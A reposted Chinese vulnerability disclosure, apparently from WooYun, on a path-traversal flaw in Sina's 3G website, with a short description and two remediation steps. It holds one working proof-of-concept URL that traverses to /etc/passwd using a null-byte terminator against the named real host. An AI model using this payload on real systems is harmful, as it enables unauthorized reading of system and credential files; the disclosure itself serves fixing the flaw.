新浪3G网站路径遍历及修复 - 网站安全 - 自学ph-自学php网

主页 > 后端 > 网站安全 >

新浪3G网站路径遍历及修复 - 网站安全 - 自学ph

来源：自学PHP网时间：2015-04-17 13:03 作者：阅读:次

[导读] 简要描述：对提交的变量没有作安全过滤和可读取文件目录作严格的控制，导致可以读取系统上任意文件，因为是php架构，可能同时导致其它严重问题。详细说明：漏洞证明：http://3g....

简要描述：对提交的变量没有作安全过滤和可读取文件目录作严格的控制，导致可以读取系统上任意文件，因为是php架构，可能同时导致其它严重问题。
详细说明：

漏洞证明：http://3g.sina.com.cn/prog/wapsite/books/subtop.php?vt=&cate=/../../../../../../../../../../../../../../../../../etc/passwd%00

修复方案：（1)限制操作目录。
（2）添加目录前缀。

作者饭@乌云

基于发起源判断CSRF攻击的方法 - 网站安全 - 自学

Php安全新闻早8点（2011-11-28 星期一） - 网站安全

最新评论

加载更多~~

添加评论

更多文章推荐

Joomla! JomSocial组件任意文件上传漏洞及修复 - 网站 2015-04-17
中企在线企业注入和编辑器拿shell及修复 - 网站安 2015-04-17
rivettracker <=1.03多个sql注射缺陷及修复 - 网站安 2015-04-17
常用注册表设置 - Windows操作系统 - 自学php 2015-04-17
对国外黑客论坛hackerstown.com的一次测试 - 网站安 2015-04-17
那些年我们一起学XSS - 15. Flash Xss进阶 [ExternalIn 2015-04-17
VC团SQL注射导致拒绝服务漏洞及修复 - 网站安全 2015-04-17
淘宝网权限绕过致任何人可随意拿走任意店铺、 2015-04-17
突破上传过滤一招,利用ashx - 网站安全 - 自学p 2015-04-17
Pluck 4.7多重缺陷及修复 - 网站安全 - 自学php 2015-04-17

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习，以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明：本站所有视频，教程都由网友上传，站长收集和分享给大家学习使用，如由牵扯版权问题请联系站长邮箱904561283@qq.com



添加评论